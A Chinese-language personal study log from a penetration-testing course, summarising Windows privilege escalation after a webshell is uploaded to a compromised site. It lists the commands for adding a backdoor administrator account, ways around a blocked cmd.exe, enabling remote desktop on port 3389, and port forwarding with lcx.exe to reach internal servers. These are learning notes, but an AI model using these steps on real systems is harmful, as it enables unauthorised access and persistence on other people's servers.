2016年4月9号渗透学习总结

  今天主要是学了一些提权的只是,这差不多是渗透的最后一步了,今天一下午都在学这个,跟着视频上做总是出问题,一出问题就得解决半天,今天这一下午真的挺累的。

  

  溢出漏洞提权:

  首先是windows下关于提权命令的学习。:

  whoami  查看用户权限
  systeminfo 查看操作系统,补丁情况  (这个很重要。我们需要看系统的补丁情况才能知道它有哪些漏洞)
  ipconfig   查看当前服务器IP ipconfig /all
  net user   查看当前用户情况
  netstat    查看当前网络连接情况  (netstat -ano  查看端口的开放情况,在远程连接时需要用到)
  tasklist   查看当前进程情况 (tasklist /svc  ,在判断远程连接端口的时需要用到)  
  taskkill   结束进程 taskkill -PID xx
  net start  启动服务
  net stop   停止服务

net user xxxx 123456 /add 添加用户名为xxxx,密码为123456的用户
net localgroup administrators xxxx /add 将用户名为xxxx的用户添加到管理员组
net user xxxx /del 删除用户为xxxx的用户

 

我们在进入网站后台上传相应大马后,需要执行cmd来提权,如果发现cmd的命令执行时拒绝访问,则可能有以下几种情况:

cmd无法执行
1.降权(C:\WINDOWS\system32/cmd.exe属性--安全--被降权)
2.删除cmd(将c盘中的cmd移动到了别的地方)
3.组件删除(wscript.shell被删除)


解决办法:找可读可写目录,上传cmd,调用cmd路径执行命令。

可读可写目录脚本,可读可写尽量不要选择带空格目录(大马里有)(上传cmd时改一下扩

展名防止防护软件)setp设置终端路径


cmd可以执行后,就要根据系统的补丁情况,去用cmd执行相应的漏洞利用程序,具体的方法网上都有可以去看一看,工具之类的可以去网上下载。


添加上了管理员用户后就要开始尝试远程连接,远程连接端口默认情况下为3389,如果链接不上,则可能有以下几种情况:

1.服务器没开3389服务(net start 看有没有terminal services)(netstart -ano看服

务器开了哪些端口)(用3389.exe开启,必须是在系统权限下)

2.服务器端口被修改
3.服务器处于内网
4.防护软件拦截


解决端口修改:
注册表读取,端口扫描(链接可疑端口),命令探针(tastlist /svc 然后 netstat -ano查看)


解决服务器在内网中(如果服务器处于内网中是无论如何也链接不是的):

端口转发:去网上下载lcx工具,

端口转发


自己的cmd里面执行
lcx.exe -listen 2222 3333
监听本地的2222端口将流量转发到3333

具体的方法在链接里有写的挺好的,我就不再说了。

 

http://www.zhengzishuai.com/455.html

 


你可能感兴趣的:(总结)